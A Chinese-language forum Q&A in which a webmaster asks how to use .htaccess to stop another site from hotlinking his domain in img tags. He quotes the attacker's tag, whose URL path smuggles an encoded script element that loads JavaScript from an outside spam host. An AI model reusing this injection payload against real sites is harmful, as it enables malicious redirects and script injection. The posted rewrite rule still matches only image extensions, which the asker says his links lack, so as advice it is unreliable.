一个恶意网站正在使用img标记在我的网站中插入重定向脚本。我已经阻止了重定向using strip_tags()
,但该站点正在消耗我所有的带宽。他使用的代码是:
<img src="http://mywebsite.com/video/%3Cscript%20type=%22text/javascript%22%20src=%22http://sex3gpvideos.sextgem.com/asss.js%22%3E%3C/script%3E" alt="loading" height="0" width="0" class="thumb"></img>
我试图添加这段代码来防止img热链接,但它没有起作用,因为img链接中没有扩展:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+.)?mywebsite.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*.(jpe?g|gif|bmp|png)$ http://i.imgur.com/qX4w7.gif [L]
我想在img标签中重定向使用我的域的所有网站<img src="http://mywebsite.com/ANYTHING-HERE"/>
至mywebsite.com
如何使用.htaccess?
您只需要一个条件即可将referer重定向到另一个位置:
尝试:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://(www.)?mywebsite.com/ [NC]
RewriteRule .*.(jpe?g|gif|bmp|png)$ http://i.imgur.com/qX4w7.gif [L,R]